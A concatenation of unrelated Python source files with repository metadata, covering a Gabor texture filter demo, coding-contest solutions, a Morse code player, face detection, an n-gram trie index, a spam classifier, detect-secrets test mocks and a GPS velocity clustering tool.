from skimage.util import img_as_float
from skimage.filters import gabor_kernel
def compute_feats(image, kernels):
    """Return an (n_kernels, 2) array of (mean, variance) filter responses."""
    feats = np.zeros((len(kernels), 2), dtype=np.double)
    for row, kern in enumerate(kernels):
        response = ndi.convolve(image, kern, mode='wrap')
        feats[row] = (response.mean(), response.var())
    return feats
def match(feats, ref_feats):
    """Return the row index of ref_feats with the smallest squared error
    to feats (the first such row on ties)."""
    best_index = None
    best_error = np.inf
    for index, ref_row in enumerate(ref_feats):
        error = ((feats - ref_row) ** 2).sum()
        if error < best_error:
            best_error, best_index = error, index
    return best_index
# prepare filter bank kernels
# 16 real Gabor kernels: 4 orientations x 2 sigmas x 2 frequencies.
kernels = []
for theta in range(4):
    theta = theta / 4. * np.pi
    for sigma in (1, 3):
        for frequency in (0.05, 0.25):
            kernel = np.real(gabor_kernel(frequency, theta=theta,
                                          sigma_x=sigma, sigma_y=sigma))
            kernels.append(kernel)
path = "C:\Users\Ojtek\Documents\PracaMagisterska\PracaMagisterska\PythonScripts\\00110.bmp"
# Downsample the image by taking every 3rd pixel in both axes.
shrink = (slice(0, None, 3), slice(0, None, 3))
brick = img_as_float(data.load(path))[shrink]
# NOTE(review): parentheses without commas do not create tuples -- these are
# a plain string and a plain array, not 1-tuples.
image_names = ('brick')
images = (brick)
def power(image, kernel):
    """Return the magnitude of the complex Gabor response of image.

    The image is z-score normalised first so responses are comparable
    across images.
    """
    image = (image - image.mean()) / image.std()
    real_response = ndi.convolve(image, np.real(kernel), mode='wrap')
    imag_response = ndi.convolve(image, np.imag(kernel), mode='wrap')
    return np.sqrt(real_response ** 2 + imag_response ** 2)
# Plot a selection of the filter bank kernels and their responses.
results = []
kernel_params = []
# A small 2x2 subset of the bank: 2 orientations x 2 frequencies.
for theta in (0, 1):
    theta = theta / 4. * np.pi
    for frequency in (0.1, 0.4):
        kernel = gabor_kernel(frequency, theta=theta)
        params = 'theta=%d,\nfrequency=%.2f' % (theta * 180 / np.pi, frequency)
        kernel_params.append(params)
        # Save kernel and the power image for each image
        results.append((kernel, power(brick, kernel)))
fig, axes = plt.subplots(nrows=5, ncols=2, figsize=(5, 6))
plt.gray()
fig.suptitle('Image responses for Gabor filter kernels', fontsize=12)
# Top-left cell stays empty (kernel column has no original image).
axes[0][0].axis('off')
# Plot original images
for ax in axes[0][1:]:
    ax.imshow(brick)
    ax.set_title("brick", fontsize=9)
    ax.axis('off')
# One row per kernel: the kernel itself, then its response image(s).
for label, (kernel, powers), ax_row in zip(kernel_params, results, axes[1:]):
    # Plot Gabor kernel
    ax = ax_row[0]
    ax.imshow(np.real(kernel), interpolation='nearest')
    ax.set_ylabel(label, fontsize=7)
    ax.set_xticks([])
    ax.set_yticks([])
    # Plot Gabor responses with the contrast normalized for each filter
    vmin = np.min(powers)
    vmax = np.max(powers)
    for ax in ax_row[1:]:
        ax.imshow(powers, vmin=vmin, vmax=vmax)
        ax.axis('off')
plt.show()
191b6f9a4ff65963a1100e25fcfa8391906eae14 | Python | alexandraback/datacollection | /solutions_2692487_0/Python/ashwink/A.py | UTF-8 | 1,092 | 3 | 3 | [] | no_license | import sys
# Python 2 solution for GCJ "Osmos": eat motes smaller than A, otherwise
# either remove the remaining motes or grow A by repeatedly adding a
# mote of size A-1, whichever needs fewer operations.
f = open(sys.argv[1], 'r')
T = int(f.readline())
for case in range(0, T):
    (A, N) = [int(x) for x in f.readline().split()]
    motes = [int(x) for x in f.readline().split()]
    # best[i] = total operations if we stop making additions at mote i.
    best = [N for i in range(0, N)]
    adds = 0
    motes.sort()
    #print "motes: %s" % motes
    for (i, mote) in enumerate(motes):
        #print "A: %d" % A
        #print "mote: %d" % mote
        if A > mote:
            # Absorb the mote; remaining cost is removing the tail.
            A += mote
            best[i] = adds + N - i - 1
        else:
            if A == 1:
                # A can never grow (A + (A-1) == A); must remove the rest.
                best[i] = N - i
                break
            # option1: drop everything including this mote
            option1 = adds + N - i
            # option2: add motes to raise A above this mote
            # then drop everything else
            while A <= mote:
                A += A - 1
                adds += 1
            A += mote
            option2 = adds + N - i - 1
            best[i] = min(option1, option2)
            #print "adds: %d" % adds
    #print "best: %s" % best
    print "Case #%d: %d" % (case + 1, min(best))
    sys.stdout.flush()
| true |
98bb2be061ebc70784a5aea386d57604cd4a0fa5 | Python | metulburr/morse_code | /main.py | UTF-8 | 1,930 | 3.46875 | 3 | [] | no_license |
import pygame
import os
import time
pygame.mixer.init()
char_time = .75
word_time = 1.5
sound = pygame.mixer.Sound('beep.wav')
def longbeep():
    """Play the beep for 0.75 s (a Morse dash)."""
    # NOTE(review): 'len' shadows the builtin inside this function.
    len = .75
    sound.play()
    time.sleep(len)
    sound.stop()
def shortbeep():
    """Play the beep for 0.25 s (a Morse dot)."""
    len = .25
    sound.play()
    time.sleep(len)
    sound.stop()
# Aliases used by the morse_code table below.
dot = lambda:shortbeep()
dash = lambda:longbeep()
morse_code = {
'a':[dot, dash],
'b':[dash, dot, dot, dot],
'c':[dash, dot, dash, dot],
'd':[dash, dot, dot],
'e':[dot],
'f':[dot, dot, dash, dot],
'g':[dash, dash, dot],
'h':[dot, dot, dot, dot],
'i':[dot, dot],
'j':[dot, dash, dash, dash],
'k':[dash, dot, dash],
'l':[dot, dash, dot, dot],
'm':[dash, dash],
'n':[dash, dot],
'o':[dash, dash, dash],
'p':[dot, dash, dash, dot],
'q':[dash, dash, dot, dash],
'r':[dot, dash, dot],
's':[dot, dot, dot],
't':[dash],
'u':[dot, dot, dash],
'v':[dot, dot, dot, dash],
'w':[dot, dash, dash],
'x':[dash, dot, dot, dash],
'y':[dash, dot, dash, dash],
'z':[dash, dash, dot, dot],
'1':[dot, dash, dash, dash, dash],
'2':[dot, dot, dash, dash, dash],
'3':[dot, dot, dot, dash, dash],
'4':[dot, dot, dot, dot, dash],
'5':[dot, dot, dot, dot, dot],
'6':[dash, dot, dot, dot, dot],
'7':[dash, dash, dot, dot, dot],
'8':[dash, dash, dash, dot, dot],
'9':[dash, dash, dash, dash, dot],
'0':[dash, dash, dash, dash, dash]
}
# Play the user's text as Morse code; unknown characters are skipped.
user = input('Convert this to morse code: ')
for char in user:
    char = char.lower()
    if char == ' ':
        time.sleep(word_time) #space between words
        continue
    try:
        if morse_code[char]:
            #print(char)
            for ch in morse_code[char]:
                ch()
                time.sleep(.25) #space between dots and dashs in one char
            time.sleep(char_time) #space between chars
    except KeyError:
        # Character has no Morse encoding; ignore it.
        pass
| true |
873751af3f94d74442f520b83396d9ceb2d5d108 | Python | milenpenev/Python_Advanced | /Exam preparation/Python Advanced Retake Exam - 14 April 2021/03-flights.py | UTF-8 | 552 | 3.15625 | 3 | [
"MIT"
] | permissive | def flights(*kwargs):
    # Arguments come in (destination, passenger-count) pairs.
    for key in range(0, len(kwargs), 2):
        if kwargs[key] == "Finish":
            # Sentinel: stop processing; anything after "Finish" is ignored.
            break
        else:
            destination = kwargs[key]
            passengers = kwargs[key + 1]
            if destination not in completed_flights:
                completed_flights[destination] = passengers
                continue
            # Destination already seen: accumulate passengers.
            completed_flights[destination] += passengers
    return completed_flights
# Module-level accumulator shared across flights() calls.
completed_flights = {}
print(flights('Vienna', 256, 'Vienna', 26, 'Morocco', 98, 'Paris', 115, 'Finish', 'Paris', 15)) | true |
9aa86dc3d4db4d669cef58680c773a7f70faa8f8 | Python | Rainer-Kempkes/IP518bb_QuizGenerator | /src/Sentence/get_subject_word_from_dependency_tree.py | UTF-8 | 539 | 3.125 | 3 | [
"MIT"
] | permissive | from pprint import pprint
def get_subject_word_from_dependency_tree(tree, tokens):
    """Return the token acting as the subject of the sentence, or None.

    :param tree: dependency edges shaped (relation, head_index, dependent_index)
    :param tokens: sentence tokens; tree indices are 1-based into this list
    :return: the first 'nsubj'/'name' token attached to the ROOT edge, or None
    """
    # Locate the ROOT edge (None when the tree has no ROOT).
    root = next((node for node in tree if node[0] == 'ROOT'), None)
    # Return the first subject/name edge hanging off the root's dependent.
    for node in tree:
        if node[0] in ('nsubj', 'name') and node[1] == root[2]:
            return tokens[node[2] - 1]
    return None
1940e537b388606dea03a667b26681a5f3901666 | Python | MichalLinek/inteview-questions | /leetcode/sequential-digits/solution.py | UTF-8 | 386 | 2.984375 | 3 | [] | no_license | class Solution:
def sequentialDigits(self, low: int, high: int) -> List[int]:
output = []
for i in range(1, 10):
for j in range(1, 10 - i + 1):
num = 0
for k in range(i):
num = num * 10 + k + j
if low <= num <= high:
output.append(num)
return output | true |
e53c3a5efd5933169faf0801fc2230578f73e5e4 | Python | leejh96/face_recognition | /웹캠에서얼굴인식.py | UTF-8 | 1,991 | 2.8125 | 3 | [] | no_license | import cv2
import numpy as np
font = cv2.FONT_ITALIC
def faceDetect():
    """Capture webcam frames, draw face/eye rectangles, and save the first
    frame where both a face and eyes are detected to data.jpg."""
    eye_detect = True
    faceCascade = cv2.CascadeClassifier(r"D:/OpenCV/FaceDetect-master/haarcascade_frontalface_default.xml") # face-detection cascade file
    eyeCascade = cv2.CascadeClassifier(r"D:/OpenCV/FaceDetect-master/haarcascade_eye.xml") # eye-detection cascade file
    try:
        cap = cv2.VideoCapture(0) # index 0: built-in webcam, 1: USB camera
    except:
        print("camera loading error")
        return
    while True:
        retval, frame = cap.read()
        frame = cv2.flip(frame, 1) # mirror mode
        if not retval:
            break
        if eye_detect:
            info = "Eye Detention ON"
        else:
            info = "Eye Detention OFF"
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        # Placeholder overwritten by the detector on the next line.
        faces = np.zeros(4)
        faces = faceCascade.detectMultiScale(gray, 1.3, 5)
        cv2.putText(frame, info, (5, 15), font, 0.5, (255, 0, 255), 1) # draw the info text over the camera frame
        eyes = np.zeros((2, 4))
        for (x, y, w, h) in faces:
            cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2) # face bounding rectangle
            if eye_detect:
                # Store the colour and grayscale regions of interest for the
                # detected face in roi_color and roi_gray.
                roi_gray = gray[y:y + h, x:x + w]
                roi_color = frame[y:y + h, x:x + w]
                eyes = eyeCascade.detectMultiScale(roi_gray) # detect eye regions in roi_gray with default (1.3, 5) parameters
                for (ex, ey, ew, eh) in eyes:
                    cv2.rectangle(roi_color, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 2)
        cv2.imshow("frame", frame)
        cv2.waitKey(30)# remove this if the window should close immediately
        if np.all(faces != 0) and np.all(eyes != 0):
            cv2.imwrite('data.jpg', frame)
            break
    cap.release()
    cv2.destroyAllWindows()
| true |
22340a8f82c4b493c6130bee3399042c42d38121 | Python | chrishefele/kaggle-sample-code | /WordImputation/src/old/trie_NGramIndex.py | UTF-8 | 2,012 | 3.1875 | 3 | [] | no_license | import sys
import marisa_trie # memory-efficient implementation of trie data structure
import time
data_format = "<i"  # RecordTrie value layout: one little-endian int (the n-gram count)
WORD_SEP = "`"  # separator used to join n-gram words into a single trie key
class NGramIndex:
    """Memory-efficient n-gram -> count index backed by a marisa RecordTrie.

    Keys are the n-gram's words joined with WORD_SEP; each key maps to a
    single integer count (see data_format). Python 2 code.
    """

    def __init__(self, ngram_file, **kwargs):
        self.build_index(ngram_file, **kwargs)

    def build_index(self, ngram_file, **kwargs):
        # Stream (key, (count,)) records straight into the trie constructor.
        data = self.data_generator(ngram_file, **kwargs)
        self.trie = marisa_trie.RecordTrie(data_format, data)

    def data_generator(self, ngram_file, max_lines=0, min_count=0):
        """Yield (unicode_key, (count,)) tuples from an n-gram file.

        Each input line is "<count> <word> <word> ...".  max_lines == 0
        means no line limit.
        """
        fin = open(ngram_file,'r')
        for n_lines, line in enumerate(fin):
            tokens = line.rstrip().split()
            count = int(tokens[0])
            if max_lines and n_lines > max_lines:
                break
            # NOTE(review): breaking (not skipping) at the first count below
            # min_count assumes the file is sorted by descending count — confirm.
            if count < min_count:
                break
            words = WORD_SEP.join(tokens[1:])
            words_start = words
            words = words.decode("utf-8")
            # Sanity check: warn if the utf-8 round trip changed the bytes.
            if words_start != words.encode("utf-8"):
                print n_lines, "reencoded NOT EQUAL"
            # print n_lines, words, type(words)
            if n_lines % 100000 == 0:
                # Progress indicator, rewritten in place every 100k lines.
                print "\r", float(n_lines)/1000000,"million",
                sys.stdout.flush()
            yield (words, (count,))
        fin.close()

    # pass in a list of words, make a string, search trie, return a list of next words
    def match_keys(self, s):
        return self.trie.keys(s)

    # pass in a list of words, make a string, search trie, return list of next words & counts
    def match_items(self, s):
        return self.trie.items(s)
if __name__ == '__main__':
    # Smoke test: build the trigram index, probe a few keys, then time lookups.
    #trigrams = NGramIndex('../data/3_grams.txt', max_lines=1000000)
    trigrams = NGramIndex('../data/3_grams.txt', min_count = 20)
    print trigrams.match_keys( u"he`said`")
    print trigrams.match_keys( u"humbugerooski`said`")
    print trigrams.match_items(u"he`said`")
    t0 = time.time()
    # Rough lookup benchmark: 10k repeated queries against the same key.
    for i in range(10000):
        result = trigrams.match_items(u"he`said`")
    print time.time() - t0, "sec per 10000"
| true |
3cd32f641c74b365be271f7ae854ed4eab09e590 | Python | ben-dent/Contract-Cheating-Analysis | /getMostFrequentBidders.py | UTF-8 | 784 | 2.78125 | 3 | [
"MIT"
] | permissive | import sqlite3 as lite
# Tally bids per distinct bidder, then print the bidders whose totals fall
# within the five largest bid counts.
con = lite.connect('JobDetails.db')
cur = con.cursor()

bids = {}

cur.execute('SELECT DISTINCT(User) FROM Bids')
bidders = [row[0] for row in cur.fetchall()]

for i, bidder in enumerate(bidders):
    print("Bidder " + str(i + 1) + "/" + str(len(bidders)))
    # Parameterized query: the previous string-concatenated SQL broke on
    # names containing quotes and was open to SQL injection.
    cur.execute("SELECT COUNT(BidID) FROM Bids WHERE User = ?", (bidder,))
    bids[bidder] = cur.fetchone()[0]

print("\n######################\n")

# The five largest bid counts; ties can make more than five bidders print.
bidNumbers = sorted(bids.values())[-5:]

for bidder in bidders:
    val = bids[bidder]
    if val in bidNumbers:
        print(bidder + ": " + str(val))

con.close()
41be280c253f41a4abb19d86924716b9315e0880 | Python | priyankninama/Python_Programmes- | /Match Substring using regular expression.py | UTF-8 | 331 | 3.484375 | 3 | [] | no_license | import re
def text_match(text):
    """Report whether *text* consists only of letters, digits and underscores."""
    pattern = r'^[a-zA-Z0-9_]*$'
    if re.search(pattern, text) is None:
        return 'Not matched any number and underscore in string \n'
    return 'Found a match \n'
# Demo: the first string contains a space and a dot, the second matches.
print(text_match("Gec gandhinagar."))
print(text_match("Python_practical_24"))
9cba9e949c77f41b842980d72b2d976667d44ad0 | Python | EmbraceLife/LIE | /my_utils/plot_math_functions.py | UTF-8 | 1,962 | 3.21875 | 3 | [] | no_license | """
plot_math_functions
"""
import matplotlib.pyplot as plt
import numpy as np
import keras.backend as K
# a function between two variables (y_true, y_pred)
def f(y_true, y_pred):
    """Exponentially damped sine of the prediction offset: e^(-y_true) * sin(y_pred - y_true)."""
    decay = np.exp(-y_true)
    return decay * np.sin(y_pred - y_true)
# Plot one curve of f per fixed y_pred value over y_true in [0, 5].
y_true = np.linspace(0,5,3001)
y_pred = np.arange(0,40000,4000)  # NOTE(review): very large offsets into sin — confirm intended
for tval in y_pred:
    plt.plot(y_true, f(y_true, tval))
plt.show()
"""
logloss function
1. loss can be overly rewarded or punished, see through viz of loss func
2. if certain range of predictions can overly reward or punish loss, we need to clip predictions
"""
import matplotlib.pyplot as plt
import numpy as np
from sklearn.metrics import log_loss
# x-axis: the predicted "buy" probability sweeping from ~0 to ~1.
x = [i*.0001 for i in range(1,10000)]

# y_true : array-like or label indicator matrix, Ground truth (correct) labels for n_samples samples
y_true1 = np.ones(9999).reshape(-1,1) # all 1s: when all targets are buy
y_true2 = np.zeros(9999).reshape(-1,1)
y_true3 = np.zeros(9999).reshape(-1,1)
y_true = np.concatenate((y_true1, y_true2, y_true3), axis=1)

y_pred1 = np.array([[i*.0001] for i in range(1,10000)]) # gradually becomes buy features
y_pred2 = np.zeros((9999,1))
y_pred3 = np.zeros((9999,1))
y_pred = np.concatenate((y_pred1, y_pred2, y_pred3), axis=1)

ll1 = []
ll2 = []
ll = []
# One log-loss value per sweep step; eps clips predictions away from 0/1.
for i in range(9999):
    # ll1.append(log_loss(y_true[i],y_pred1[i],eps=1e-15, labels=[1.0, 0.0]))
    # ll2.append(log_loss(y_true[i],y_pred2[i],eps=1e-15, labels=[1.0, 0.0]))
    ll.append(log_loss(y_true[i],y_pred[i],eps=1e-15, labels=[1.0, 0.0]))

plt.plot(x, ll, c='blue', label="pred_decrease")
# plt.axis([-.05, 1.1, -.8, 10])
plt.title("How loss move when preds[buy] move from 0.0 to 1.0")
plt.xlabel("preds[buy] grow from 0.0 to 1.0")
plt.ylabel("loss")
plt.legend(loc="best")
plt.show()
#
# import matplotlib.pyplot as plt
# import numpy as np
# import keras.backend as K
#
# y_pred = np.random.random(100)
# y_true = np.linspace(0,5,3001)
#
# classes = K.categorical_crossentropy(y_pred, y_true)
# print(classes)
| true |
6288c6a6508a182d0cefd0222f92b2c48d0a93ba | Python | amyd99/tvshow-crawler | /get-tv-shows.py | UTF-8 | 1,578 | 2.796875 | 3 | [
"Apache-2.0"
] | permissive | import sys
import http.client
from pathlib import Path
from html.parser import HTMLParser
class MyHTMLParser(HTMLParser):
    """Collects download URL / file-name pairs from <input class="down_url"> tags."""

    def __init__(self):
        HTMLParser.__init__(self)
        self.found = False   # True while the current <input> tag is a download entry
        self.tv_list = []    # accumulated {"url": ..., "name": ...} dicts

    def handle_starttag(self, tag, attrs):
        """Record the url/name attributes of matching <input> tags."""
        if tag != "input":
            return
        url = None
        name = None
        for attr in attrs:
            if len(attr) != 2:
                continue
            key, value = attr
            if key == "class" and value == "down_url":
                self.found = True
            elif key == "value":
                url = value
            elif key == "file_name":
                name = value
        if self.found:
            self.found = False
            # Bug fix: a matching tag without value/file_name attributes used
            # to raise UnboundLocalError; such tags are now skipped.
            if url is not None and name is not None:
                self.tv_list.append({"url": url, "name": name})

    def output_rss(self, flist):
        """Print the URL of every entry whose file name is not already in *flist*."""
        for tv in self.tv_list:
            if tv["name"] not in flist:
                print(tv["url"])
def parse(tv, conn):
    """Fetch one show's page over *conn* and print download URLs for
    episodes not already present in the local media folder."""
    #print("parse", url, file=sys.stderr)
    print("")
    print(tv["folder"].replace("/", "\\"))
    conn.request("GET", tv["url"])
    response = conn.getresponse()
    if response.status != 200:
        return
    page_parser = MyHTMLParser()
    page_parser.feed(str(response.read(), "gbk"))
    existing = [entry.name for entry in Path("D:/Media/TV Shows/" + tv["folder"]).iterdir()]
    page_parser.output_rss(existing)
flist = [ p.name for p in Path("D:/Media/TV Shows/" + tv["folder"]).iterdir() ]
parser.output_rss(flist)
# Shows to check: site-relative page URL plus the local library folder.
tv_dict = [
    {"url": "/content/meiju22476.html", "folder": "The Walking Dead/Season 07"},
    {"url": "/content/meiju22422.html", "folder": "Criminal Minds/Season 12"}
]

# One shared HTTP connection, reused for every show page.
conn = http.client.HTTPConnection("www.meijutt.com")
for tv in tv_dict:
    parse(tv, conn)
| true |
53ec3c80ee1d0ed9007360f38dd34fc50dd0e494 | Python | BlueWolf2137/bootcamp | /1/6.py | UTF-8 | 185 | 3.9375 | 4 | [] | no_license | a = float(input("Podaj liczbę: "))
b = (a>10)
c = (a<=15)
d = ((a%2)==0)
print(f"Większa od 10: {a>10}")
print(f"Mniejsza równa 15: {a<=15}")
print(f"Podzielna przez 2: {(a%2)==0}") | true |
67a71f298901a771e96e1e28e8495e05d6b84bfc | Python | Contrast-Labs/detect-secrets | /testing/mocks.py | UTF-8 | 2,618 | 2.828125 | 3 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | """This is a collection of utility functions for easier, DRY testing."""
import io
from collections import defaultdict
from contextlib import contextmanager
from types import ModuleType
from typing import Any
from typing import Dict
from typing import Generator
from typing import IO
from typing import Iterator
from typing import Optional
from unittest import mock
def mock_file_object(string: str) -> IO:
    """Return an in-memory file-like object seeded with *string*."""
    return io.StringIO(string)
class PrinterShim:
    """Accumulates printed messages into one string for test assertions."""

    def __init__(self) -> None:
        self.clear()

    def add(self, message: str, *args: Any, **kwargs: Any) -> None:
        # print-compatible signature: extra args/kwargs are accepted but ignored.
        self.message = self.message + str(message) + '\n'

    def clear(self) -> None:
        # Reset the captured output buffer.
        self.message = ''
@contextmanager
def mock_printer(
    module: ModuleType,
    shim: Optional[PrinterShim] = None,
) -> Generator[PrinterShim, None, None]:
    """Temporarily route *module*'s `print` into a PrinterShim.

    Yields the shim (a fresh one unless the caller supplied its own) so
    the test can inspect everything the module printed.
    """
    shim = shim or PrinterShim()
    with mock.patch.object(module, 'print', shim.add):
        yield shim
class MockLogWrapper:
    """Captures log output per level so tests can check what was logged."""

    def __init__(self) -> None:
        self.messages: Dict[str, str] = defaultdict(str)

    def _record(self, level: str, message: str, args: Any) -> None:
        # Mirrors logging's lazy %-style formatting of message arguments.
        self.messages[level] += (str(message) + '\n') % args

    def error(self, message: str, *args: Any) -> None:
        self._record('error', message, args)

    @property
    def error_messages(self) -> str:  # pragma: no cover
        return self.messages['error']

    def warning(self, message: str, *args: Any) -> None:
        self._record('warning', message, args)

    @property
    def warning_messages(self) -> str:  # pragma: no cover
        return self.messages['warning']

    def info(self, message: str, *args: Any) -> None:
        self._record('info', message, args)

    @property
    def info_messages(self) -> str:  # pragma: no cover
        return self.messages['info']

    def debug(self, message: str, *args: Any) -> None:
        self._record('debug', message, args)

    @property
    def debug_messages(self) -> str:  # pragma: no cover
        return self.messages['debug']
@contextmanager
def disable_gibberish_filter() -> Iterator[None]:
    """
    We can't use `Settings.disable_filters` here: `parse_args` is what
    *enables* this filter, so for tests driving the `main` flow there is no
    hook before the call. Since this only runs in test environments, we
    simply patch the feature flag off for the duration of the context.
    """
    patcher = mock.patch(
        'detect_secrets.filters.gibberish.is_feature_enabled',
        return_value=False,
    )
    patcher.start()
    try:
        yield
    finally:
        patcher.stop()
| true |
0de535f9a72eb1db610b9fb478f8d743e83a68d6 | Python | pawel-baster/enc-backup | /encbackup/helpers/logging.py | UTF-8 | 414 | 2.671875 | 3 | [] | no_license | '''
Created on 2012-04-01
@author: pawel
'''
import datetime
class Logger(object):
    """Minimal static logger that prefixes each line with a timestamp.

    Python 2 code (uses print statements).
    """

    # Set to False to silence Logger.debug() output.
    printDebug = True

    @staticmethod
    def _printLine(msg):
        # Prefix: "YYYY-MM-DD HH:MM:SS :" followed by the message.
        print datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S :'), msg

    @staticmethod
    def log(msg):
        Logger._printLine(msg)

    @staticmethod
    def debug(msg):
        # Debug output is gated on the class-level printDebug flag.
        if Logger.printDebug:
            Logger._printLine(msg)
| true |
75b6db5526db293f3d5fbaa3998306fdfa66fe37 | Python | pravali96/Natural-Language-Processing | /Spam Classifier Models/SpamClassifierModel.py | UTF-8 | 1,733 | 2.984375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Tue Jun 22 13:23:24 2021
@author: prava
"""
import pandas as pd
# Load the tab-separated SMS corpus (hard-coded local path).
messages=pd.read_csv('C:/Users/prava/Downloads/SMSSpamCollection.csv',
                    sep='\t', names=["label","message"])
messages.head()  # NOTE(review): no-op outside a notebook

import re
import nltk
nltk.download('stopwords')

from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
ps=PorterStemmer()
corpus=[]
# Preprocessing the texts: strip non-letters, lowercase, drop stopwords, stem.
for i in range(0, len(messages)):
    review = re.sub('[^a-zA-Z]', ' ', messages['message'][i])
    review = review.lower()
    review = review.split()
    review = [ps.stem(word) for word in review if not word in stopwords.words('english')]
    review = ' '.join(review)
    corpus.append(review)
corpus  # NOTE(review): no-op outside a notebook

# Creating bag of words using CountVectorizer
from sklearn.feature_extraction.text import CountVectorizer
cv=CountVectorizer(max_features=2500) # There are 6296 unique words, selected 2500 words
X=cv.fit_transform(corpus).toarray()

# One-hot the label column and keep the second column (spam indicator).
y=pd.get_dummies(messages['label'])
y=y.iloc[:,1].values
y  # NOTE(review): no-op outside a notebook

# Train Test Split
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 0)

# Training model using Naive bayes classifier
from sklearn.naive_bayes import MultinomialNB
spam_detect_model = MultinomialNB().fit(X_train, y_train)

y_pred=spam_detect_model.predict(X_test)

# Import library to check accuracy
from sklearn.metrics import classification_report,confusion_matrix,accuracy_score
matrix=confusion_matrix(y_test,y_pred)
print(matrix)
score=accuracy_score(y_test,y_pred)
print(score)
report=classification_report(y_test,y_pred)
print(report)
| true |
6db918db62fbe77b71e3044930646f689495679b | Python | GeoGateway/GNSS_clustering | /clusterVelocity.py | UTF-8 | 11,509 | 3.0625 | 3 | [] | no_license | #!/usr/bin/env python3
# Author: Developed for GeoGateway by Robert Granat and Michael Heflin
# Date: Aug 7, 2019
# Organization: JPL, California Institute of Techology
prolog="""
**PROGRAM**
clusterVelocities.py
**PURPOSE**
Calculate cluster membership of GPS stations based on velocities obtained from the routine getVelocities.py. Return labeled kml and text table files.
See http://scikit-learn.org/stable/modules/clustering.html for information on individual clustering methods.
**USAGE**
"""
epilog="""
**EXAMPLE**
clusterVelocity.py -input velocity_table.txt -output labeled_velocity.kml -feature_name "Lat" "Lon" "Delta E" "Delta N" "Delta V" -k 10 --scale -method k-means
**COPYRIGHT**
| Copyright 2018, by the California Institute of Technology
| United States Government Sponsorship acknowledged
| All rights reserved
**AUTHORS**
| Developed for GeoGateway by Robert Granat and Michael Heflin
| Jet Propulsion Laboratory
| California Institute of Technology
| Pasadena, CA, USA
"""
# Import python modules
import numpy as np
import matplotlib
import matplotlib.cm as cm
import random
import argparse
import math
import pandas as pd
from sklearn.cluster import KMeans
from sklearn.cluster import AffinityPropagation
from sklearn.cluster import MeanShift
from sklearn.cluster import SpectralClustering
from sklearn.cluster import AgglomerativeClustering
from sklearn.cluster import DBSCAN
from sklearn.mixture import GaussianMixture
from sklearn.mixture import BayesianGaussianMixture
from sklearn import preprocessing
def runCmd(cmd):
    '''Run *cmd* through bash and return its stdout as bytes.

    Raises UserWarning (with stderr attached) if the command exits non-zero.
    '''
    # Bug fix: subprocess was never imported anywhere in this file, so any
    # call raised NameError. Imported locally to keep the fix self-contained.
    import subprocess

    p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE, executable='/bin/bash')
    (out, err) = p.communicate()
    if p.returncode != 0:
        raise UserWarning('failed to run {}\n{}\n'.format(cmd.split()[0],
                          err))
    return out
def _getParser():
    """Build the argparse parser for the velocity-clustering tool."""
    arg_parser = argparse.ArgumentParser(
        description=prolog,
        epilog=epilog,
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    arg_parser.add_argument('-input', type=str, required=True,
        help='name of the input velocity file')
    arg_parser.add_argument('-output', type=str, required=True,
        help='name of the labeled output velocity kml file')
    arg_parser.add_argument('-k', type=int, required=False,
        help='number of clusters; required for k-means, spectral, agglomerative, gmm, and bgmm; for bgmm represents only an *upper bound* on the number of clusters')
    arg_parser.add_argument('-feature_name', metavar='NAME', type=str, nargs='+', required=True,
        help='names of features to use in clustering; must be some subset of {"Lon", "Lat", "Delta E", "Delta N", "Delta V", "Sigma E", "Sigma N", "Sigma V"}')
    arg_parser.add_argument('-method', type=str, required=False, default='k-means',
        help='clustering method; must be one of {k-means, affinity, meanshift, spectral, agglomerative, bdscan, gmm, bgmm} (default: use k-means)')
    arg_parser.add_argument('--scale', action='store_true', default=False, required=False,
        help='scale features to have zero mean and unit variance (default: no scaling)')
    return arg_parser
def main():
    """Cluster GPS station velocities and write labeled KML/TXT outputs.

    Reads the table named by -input, clusters the features selected by
    -feature_name with the -method algorithm, then writes:
      <output>.kml           markers + velocity vectors + sigma ellipses
      <output>_novector.kml  markers only
      <output>.txt           the input table plus a cluster Label column
    """
    # Read command line arguments
    parser = _getParser()
    args = parser.parse_args()

    # Read the velocity file and extract features
    # Assumes Mike Helfin's formatting in getVelocities.py
    df = pd.read_csv(args.input, skiprows=1, names=['Site', 'Lon', 'Lat', 'Delta E', 'Delta N', 'Delta V', 'Sigma E', 'Sigma N', 'Sigma V'], delim_whitespace=True)
    Z = df[args.feature_name]

    # Optional: scale features to have zero mean and unit covariance
    if args.scale:
        Z = preprocessing.scale(Z)

    # Perform the clustering; every branch sets `labels` and the cluster count `k`.
    if args.method == 'k-means':
        k = args.k
        kmeans = KMeans(n_clusters = k, init='k-means++', max_iter = 1000, n_init = 10, random_state=1).fit(Z)
        centroids = kmeans.cluster_centers_
        labels = kmeans.labels_
    elif args.method == 'affinity':
        af = AffinityPropagation().fit(Z)
        cluster_centers_indices = af.cluster_centers_indices_
        labels = af.labels_
        k = len(cluster_centers_indices)
    elif args.method == 'meanshift':
        ms = MeanShift().fit(Z)
        labels = ms.labels_
        cluster_centers = ms.cluster_centers_
        labels_unique = np.unique(labels)
        k = len(labels_unique)
    elif args.method == 'spectral':
        k = args.k
        sc = SpectralClustering(n_clusters = k).fit(Z)
        labels = sc.labels_
    elif args.method == 'agglomerative':
        k = args.k
        ac = AgglomerativeClustering(n_clusters = k).fit(Z)
        labels = ac.labels_
    elif args.method == 'dbscan':
        db = DBSCAN().fit(Z)
        labels = db.labels_
        labels_unique = np.unique(labels)
        k = len(labels_unique)
    elif args.method == 'gmm':
        k = args.k
        gm = GaussianMixture(n_components = k, n_init = 10).fit(Z)
        labels = gm.predict(Z)
    elif args.method == 'bgmm':
        k = args.k
        bgm = BayesianGaussianMixture(n_components = k, n_init = 10).fit(Z)
        labels = bgm.predict(Z)
        labels_unique = np.unique(labels)
        k = len(labels_unique)
    else:
        raise ValueError('Invalid clustering method specified')

    # Rotate labels vector into a column
    labels = np.reshape(labels,(-1,1))

